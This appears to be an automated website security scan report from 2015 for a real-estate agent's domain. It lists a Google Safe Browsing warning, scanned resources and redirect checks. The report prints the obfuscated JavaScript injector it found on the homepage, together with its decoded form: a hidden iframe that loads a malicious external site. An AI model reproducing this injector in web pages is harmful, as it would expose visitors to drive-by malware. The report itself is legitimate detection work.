Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=buckheadrealestateagent.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://buckheadrealestateagent.com/ | 200 OK Content-Length: 24464 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) y=0;while(y<123)document.write(String.fromCharCode('=jgsbnf!tsd>#iuuq;00if.jt.tif/dp/dd0xfc0tfbsdi/qiq#!xjeui>#511#!ifjhiu>#511#!gsbnfcpsefs>#2#!tuzmf>#ejtqmbz;opof#?=0jgsbnf?'.charCodeAt(y++)-1)) Decoded script: <iframe src="http://he-is-she.co.cc/web/search.php" width="400" height="400" frameborder="1" style="display:none"></iframe> Antivirus reports:
| ||
http://adfusionnetwork.com/?campaignid=135324812&type=tracking | 200 OK Content-Length: 12526 Content-Type: text/html | clean |
http://a1.dnbizcdn.com/js/b/client.js | 200 OK Content-Length: 1723 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/dp.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://cpro.baidustatic.com/test404page.js | 404 Not Found Content-Length: 11 Content-Type: text/html | clean |
http://cpro.baidustatic.com/cpro/ui/domain_parking.js | 200 OK Content-Length: 131040 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/ci.js | 200 OK Content-Length: 71507 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/caf.js | 200 OK Content-Length: 8900 Content-Type: application/x-javascript | clean |
http://mediamindcal.com/?campaignid=12451598&type=tracking | 200 OK Content-Length: 978 Content-Type: text/html | clean |
http://mediamindcal.com/?ga=Rqsq8c11RZO1nVRB9gZSdTGoufaSyKycGj9vAVGoTE8Ufvl2mntufKqcG8oLo9SQFZARDp8%2BnZi9dmSLblTlFA%3D%3D&gerf=7Y1ONtEQWq%2FqnfuDuwqwv1hP20gq8avJ8oe394VHdW0%3D&guro=DPlmbaoQ2YDFSigSm3N%2Bt1JhuMVAz0vw4vqgYml%2BKuXT9l5UIDmRB2v7j44yz8E%2B5mvX1tBWmq0w5%2FF0oIZx%2FRQfS3h%2BgjpqyMF6VHaulX4%3D&campaignid=12451598&type=tracking | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: Keep-Alive Date: Wed, 25 Feb 2015 10:23:39 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=97 Set-Cookie: gvc=908vr1724054198718395; expires=Mon, 24-Feb-2020 10:23:39 GMT; path=/; domain=mediamindcal.com; httponly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKrfIMFkSaoTSqKmC+BrghK0CpDHc0MuVzmMHin8LIORhpXbped+iYhSnZurWnEO0zcKcVIrzp026LVc5pMB9bUCAwEAAQ==_UaTU+Sc9Q7tLHIt7JD3yajcdcJExRKTWTNfC0fFCcar9pFnkfFCpc83t54xwqCSE1X22/FwD7U24vbvCVMQgWw== | clean |
http://mediamindcal.com/rg-erdr.php?_rpo=t | HTTP/1.1 302 Found Connection: Keep-Alive Date: Wed, 25 Feb 2015 10:23:41 GMT Location: http://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=&domain_name=mediamindcal.com&channel=&drid=&output=html Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=117 | clean |
http://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=&domain_name=mediamindcal.com&channel=&drid=&output=html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: buckheadrealestateagent.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 10:23:17 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 24464
Content-Type: text/html
Last-Modified: Mon, 23 Jan 2012 10:21:10 GMT
...24464 bytes of data.
GET / HTTP/1.1
Host: buckheadrealestateagent.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 10:23:17 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 24464
Content-Type: text/html
Last-Modified: Mon, 23 Jan 2012 10:21:10 GMT
...24464 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: buckheadrealestateagent.com
Referer: http://www.google.com/search?q=buckheadrealestateagent.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: buckheadrealestateagent.com
Referer: http://www.google.com/search?q=buckheadrealestateagent.com
Result:
The result is similar to the first query. There are no suspicious redirects found.